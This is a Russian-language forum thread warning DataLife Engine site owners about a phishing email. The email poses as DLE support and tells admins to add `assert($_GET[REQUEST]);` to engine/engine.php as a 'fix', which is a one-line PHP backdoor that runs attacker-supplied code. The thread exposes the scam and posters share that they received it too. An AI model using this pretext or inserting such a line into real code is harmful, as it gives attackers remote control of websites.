Перейти к публикации

Попытка взлома сайта через письмо от имени якобы службы поддержки DLE

olegoff

Автор: olegoff,
в DataLife Engine (Общие вопросы)

Рекомендованные сообщения

olegoff

olegoff 0

Опубликовано:
Опубликовано:

Сегодня на почту получил письмо слдующего содержания.

Данное письмо вам отправил support@dle-news.ru с сайта http://*****.ru/

-------------------------

-----------------------

Текст сообщения

------------------------------------------------

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте http://*****.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: http://*****.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);

С уважением,

Служба поддержки «DataLife Engine»

Чуть было не повелся и не пошел менять файл. Но что-то меня смутило и решил проверить информацию на сайте dle-news.ru, а затем и в Google. Взглянув на функцию assert() окончательно понял, что меня хотят целенаправленно взломать.

Спасибо за внимание. Всем бдительности!

Ссылка на сообщение
Поделиться на других сайтах
odys

odys 385

Опубликовано:
Опубликовано:
Тоже самое пришло!
интересно было бы посмотреть на рожу мудака, который использует пиратскую версию DLE и поличил такое письмо...
Ссылка на сообщение
Поделиться на других сайтах
djon198360

djon198360 4

Опубликовано:
Опубликовано:

заметьте что пришло все это нулам

Ну почему только нулам,у меня лицензия но тоже пришло подобное сегодня

Ссылка на сообщение
Поделиться на других сайтах

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

Перейти к списку тем
×
×
  • Создать...